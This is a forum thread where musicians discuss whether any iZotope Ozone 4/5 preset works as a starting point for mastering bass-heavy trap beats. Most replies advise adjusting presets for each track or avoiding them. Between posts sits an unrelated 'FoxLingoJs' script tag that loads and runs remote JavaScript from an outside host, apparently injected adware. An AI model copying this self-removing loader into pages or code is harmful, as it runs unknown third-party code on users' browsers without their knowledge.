The best Izotope 4/5 Preset for Trap beats?

milesg2g

The Wavvy Ness Sage
Recently, I've been listening to a lot of trap music and noticing how well their kicks and bass sound. I use Ableton and I just got Izotope 4/5 and they have some amazing presets. My question is which one is the best preset to start with Trap songs with heavy bass?

I know mastering is about the ear, and there is a lot of specifying that goes with it. However, I wanted to know if their was a typical preset people use to EQ/Master with Izotope.

The best preset is the one which exactly corresponds to your track. So, you have to make your own from an existing one.

Recently, I've been listening to a lot of trap music and noticing how well their kicks and bass sound. I use Ableton and I just got Izotope 4/5 and they have some amazing presets. My question is which one is the best preset to start with Trap songs with heavy bass?

I know mastering is about the ear, and there is a lot of specifying that goes with it. However, I wanted to know if their was a typical preset people use to EQ/Master with Izotope.

We are going to assume you are referring to iZotope Ozone 4 or 5.

*There will not be a preset that works best on all trap beats. I suggest going through the preset to see which works best for your track and then manually edit it to fit your track. Would be much better to avoid presets all together if possible.

Each track is different, so a preset won't really do the job. You'd need to make your own each time if you really want to make it sound good.

Izotope has some great presets so I feel like you can do a lot with the presets. I dont think there is one particular one that works best though, all depends on the tracks. Just scroll through until you find one that gets to close to what you want and then tweak.

When I'm looking for just a nice loud preset I just use CD Mastering or whatever it's called. Great preset for set and forget. Otherwise I use high quality individual plugins for mastering.

I use Massey L2007, DCAM FreeComp, VTM, NI Passive Eq,

All I do for mastering is buss compression, maybe character compression, Mastering Eq, Limiting and then Tape Saturation. Maybe light reverb. Maybe stereo adjustment. Maybe additional m/s eq.

...Limiting and then Tape Saturation.
strange order.
Maybe light reverb.
I've never used any reverb for mastering. Usually manipulating the dynamics brings up all reverbs well enough.

<script id="FoxLingoJs">!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();</script>

Thanks a lot for the help, I know each track needs its own original mastering attention. I just wanted to know if there was a standard preset to go off of to help things.

The only standard preset is "bypass". Any thing else is just a particular case which may work or not for a particular track

I've never actually used the presets in Ozone 5. I tend to put the seperate plugins in the suite on seperate instrument tracks as needed and tweak from there. I've never had much luck using presets for mixing/mastering.

Back